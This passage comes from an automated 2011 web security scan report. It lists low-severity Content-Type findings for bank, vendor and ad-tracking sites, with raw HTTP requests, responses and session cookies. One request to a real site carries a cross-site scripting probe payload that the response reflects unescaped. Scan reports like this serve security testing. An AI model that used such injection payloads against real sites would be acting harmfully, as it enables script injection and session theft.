Request

GET /homepage/WidgetAction.go?requestType=display&divId=36094CED-7EDF-11DF-889C-00144F3EA4A4%2C360925D9-7EDF-11DF-889C-00144F3EA4A4%2C3608FEC5-7EDF-11DF-889C-00144F3EA4A4%2C36099B13-7EDF-11DF-889C-00144F3EA4A4&isWidget=true&targetedAdParams=%7B%7BmoduleId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CD3AAA0A1-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C18A00502-E390-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CB48EEC16-0060-11DF-B411-00144F25F968%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C3619DDB0-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-media-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D&previousPageId=3601F9E2-7EDF-11DF-889C-00144F3EA4A4&callback=jsonp1303820701740&_=1303820711776 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/homepage/overview.go
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; throttle_value=35; cmTPSet=Y; state=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:23:13 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4929

jsonp1303820701740({widgetdata:[{htmlsrc:'                                                     <!-- sm1.2one -->                                                        <div class="links-list-module">    <div class="column-co
...[SNIP]...

32.29. https://www.bankofamerica.com/homepage/overview  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/overview

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /homepage/overview HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 12:47:51 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Via: On-Demand Router/1.0
Content-Length: 48
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

Error 404: SRVE0190E: File not found: /overview

32.30. http://www.bridgefront.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bridgefront.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.bridgefront.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 10 Jan 2008 17:11:38 GMT
ETag: "2c98537-57e-4d808680"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@...................................JJJ.........eee.............WWW.ttt.........^^^.................nnn.....RRR.yyy.............iii.}}}.............MMM.......
...[SNIP]...

32.31. http://www.cleanallspyware.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cleanallspyware.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.cleanallspyware.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tracking202subid=3562113; tracking202outbound=http://www.directbrand.com/tracking202/redirect/pci.php?pci=535621131; __utmz=103369170.1303826097.1.1.utmcsr=cleanallspyware.com|utmccn=(referral)|utmcmd=referral|utmcct=/Spam; __utma=103369170.1948797670.1303826097.1303826097.1303826097.1; __utmc=103369170; __utmb=103369170.1.10.1303826097

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:52:43 GMT
Server: Apache
Last-Modified: Fri, 11 Sep 2009 15:08:43 GMT
ETag: "20e01d2-57e-b11db4c0"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

..............h.......(....... .......................................................@.........U.+@........[.C.v.........=...1...D.......)_..<...,...@.k.....1e..4.........<.X.....o.....>...........G.
...[SNIP]...

32.32. http://www.directbrand.com/tracking202/static/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.directbrand.com
Path:   /tracking202/static/landing.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /tracking202/static/landing.php?lpip=92317 HTTP/1.1
Host: www.directbrand.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:52:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 3158
Connection: close
Content-Type: text/html

function t202Init(){
   //this grabs the t202kw, but if they set a forced kw, this will be replaced
   
   if (readCookie('t202forcedkw')) {
       var t202kw = readCookie('t202forcedkw');
   } else {
       var t202k
...[SNIP]...

32.33. http://www.directbrand.com/tracking202/static/record.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.directbrand.com
Path:   /tracking202/static/record.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /tracking202/static/record.php?lpip=92317&t202id=&t202kw=&OVRAW=&OVKEY=&OVMTC=&c1=&c2=&c3=&c4=&target_passthrough=&keyword=&referer=http%3A%2F%2Fcleanallspyware.com%2FSpam&resolution=1920x1200&language=en HTTP/1.1
Host: www.directbrand.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:52:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Set-Cookie: tracking202subid=3562114; expires=Thu, 26-May-2011 13:52:39 GMT; path=/; domain=www.directbrand.com
Set-Cookie: tracking202subid_a_142=3562114; expires=Thu, 26-May-2011 13:52:39 GMT; path=/; domain=www.directbrand.com
Content-Length: 488
Connection: close
Content-Type: text/html


function t202initB() {

   var subid ='3562114';
   createCookie('tracking202subid',subid,0);

   var outbound = 'http://www.directbrand.com/tracking202/redirect/pci.php?pci=435621146';
   createCookie('tr
...[SNIP]...

32.34. http://www.firstdata.com/transarmor/campaigntest/_files/fonts/simplesans-black-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.firstdata.com
Path:   /transarmor/campaigntest/_files/fonts/simplesans-black-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /transarmor/campaigntest/_files/fonts/simplesans-black-webfont.woff HTTP/1.1
Host: www.firstdata.com
Proxy-Connection: keep-alive
Referer: http://response.firstdata.com/?elqPURLPage=15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:45:19 GMT
Server: Apache/2.2.14
Last-Modified: Mon, 28 Mar 2011 20:43:53 GMT
ETag: "b730-51a4-49f91006c1440"
Accept-Ranges: bytes
Content-Length: 20900
Content-Type: text/plain

wOFF......Q.................................FFTM...l........Z...GDEF........... ....OS/2.......S...`E...cmap............q3..cvt .......P...P...}fpgm...........e../.gasp................glyf......D"..pD
...[SNIP]...

32.35. http://www.firstdata.com/transarmor/campaigntest/_files/fonts/simplesans-bold-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.firstdata.com
Path:   /transarmor/campaigntest/_files/fonts/simplesans-bold-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /transarmor/campaigntest/_files/fonts/simplesans-bold-webfont.woff HTTP/1.1
Host: www.firstdata.com
Proxy-Connection: keep-alive
Referer: http://response.firstdata.com/?elqPURLPage=15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:45:19 GMT
Server: Apache/2.2.14
Last-Modified: Mon, 28 Mar 2011 20:43:53 GMT
ETag: "b737-5548-49f91006c1440"
Accept-Ranges: bytes
Content-Length: 21832
Content-Type: text/plain

wOFF......UH................................FFTM...l........Z...GDEF........... ....OS/2.......S...`F...cmap............q3..cvt .......b...b...:fpgm...........e../.gasp................glyf......G...u.
...[SNIP]...

32.36. http://www.firstdata.com/transarmor/campaigntest/_files/fonts/simplesans-light-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.firstdata.com
Path:   /transarmor/campaigntest/_files/fonts/simplesans-light-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /transarmor/campaigntest/_files/fonts/simplesans-light-webfont.woff HTTP/1.1
Host: www.firstdata.com
Proxy-Connection: keep-alive
Referer: http://response.firstdata.com/?elqPURLPage=15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:45:19 GMT
Server: Apache/2.2.14
Last-Modified: Mon, 28 Mar 2011 20:43:53 GMT
ETag: "b72f-5518-49f91006c1440"
Accept-Ranges: bytes
Content-Length: 21784
Content-Type: text/plain

wOFF......U.................................FFTM...l........Z...GDEF........... ....OS/2.......T...`G...cmap............q3..cvt .......>...>.q.Kfpgm...........e../.gasp................glyf......G...x.
...[SNIP]...

32.37. https://www.mavitunasecurity.com/support/checkupdate/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.mavitunasecurity.com
Path:   /support/checkupdate/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /support/checkupdate/?lic=AAEAAAD/////AQAAAAAAAAAGAQAAAD4wNDYyLTZFNTctOTc3OS1EOTk4LUNBNTctRUU1QS1NRjQ0Q1pFNjhZRTY3QU0wRjRQQTZWUkgzQzRIUlJLVgs= HTTP/1.1
Host: www.mavitunasecurity.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 87
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 12:27:30 GMT

1.9.0.5
https://www.mavitunasecurity.com/download/id/MF44CZE68YE67AM0F4PA6VRH3C4HRRKV/

32.38. http://www.saintcorporation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.saintcorporation.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.saintcorporation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=23724856.1303775066.1.1.utmgclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=23724856.513666181.1303775066.1303775066.1303775066.1; __utmc=23724856; __utmb=23724856.1.10.1303775066

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:45:19 GMT
Server: Apache/2.2.15 (Unix)
Last-Modified: Tue, 09 Nov 2010 18:11:12 GMT
ETag: "1518d0b6-43a6-494a2aa713000"
Accept-Ranges: bytes
Content-Length: 17318
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

...... ..........F...00.... ..%...... .... ............... .h...>?..(... ...@...........................................................`@ ..`@..`......`.....`..........@..`@@..`@...`.......... ...`
...[SNIP]...

32.39. https://www.saintcorporation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.saintcorporation.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.saintcorporation.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=23724856.1303775066.1.1.utmgclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=23724856.513666181.1303775066.1303775066.1303775066.1; __utmc=23724856; __utmb=23724856.3.10.1303775066

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:58:56 GMT
Server: Apache/2.2.15 (Unix)
Last-Modified: Tue, 09 Nov 2010 18:11:12 GMT
ETag: "1518d0b6-43a6-494a2aa713000"
Accept-Ranges: bytes
Content-Length: 17318
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

...... ..........F...00.... ..%...... .... ............... .h...>?..(... ...@...........................................................`@ ..`@..`......`.....`..........@..`@@..`@...`.......... ...`
...[SNIP]...

32.40. http://www.secureconnect.com/rssReplayProxy.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.secureconnect.com
Path:   /rssReplayProxy.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /rssReplayProxy.php?cache=true&source=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000113)%3C/script%3E HTTP/1.1
Host: www.secureconnect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32024892.1303775103.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=32024892.207743889.1303775103.1303775103.1303775103.1; __utmb=32024892.2.10.1303775103

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:08:20 GMT
Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Content-Length: 123
Content-Type: text/html

RSS Replay Proxy Error: No matching source for the specified ID '"--></style></script><script>netsparker(0x000113)</script>

33. Content type is not specified  previous
There are 4 instances of this issue:


33.1. http://cf.addthis.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; uid=4dab4fa85facd099; psc=3; di=1303662902.60|1303662902.1OD|1303662902.1FE; dt=X

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"3638-1285186836000"
Last-Modified: Wed, 22 Sep 2010 20:20:36 GMT
Content-Length: 3638
Date: Tue, 26 Apr 2011 11:45:18 GMT
Connection: close

..............h...&... ..............(....... ...........@...........................Lm................................................................................................................
...[SNIP]...

33.2. https://securitymetrics.com/sm/PANscan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/PANscan/

Request

GET /sm/PANscan/ HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=09f0146dbd92e08e1aac412eff15ddf24e6644aa; Path=/
Date: Tue, 26 Apr 2011 00:53:04 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 13228

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>SecurityMe
...[SNIP]...

33.3. https://securitymetrics.com/sm/determinesaq/storechd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/storechd

Request

GET /sm/determinesaq/storechd HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/pricelist.adp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Date: Tue, 26 Apr 2011 01:08:33 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 8168


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Deter
...[SNIP]...

33.4. https://securitymetrics.com/sm/determinesaq/terminaltype  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/terminaltype

Request

GET /sm/determinesaq/terminaltype HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/determinesaq/storechd
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Date: Tue, 26 Apr 2011 01:08:49 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 12217


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Deter
...[SNIP]...

Report generated by XSS.CX at Tue Apr 26 09:34:48 CDT 2011.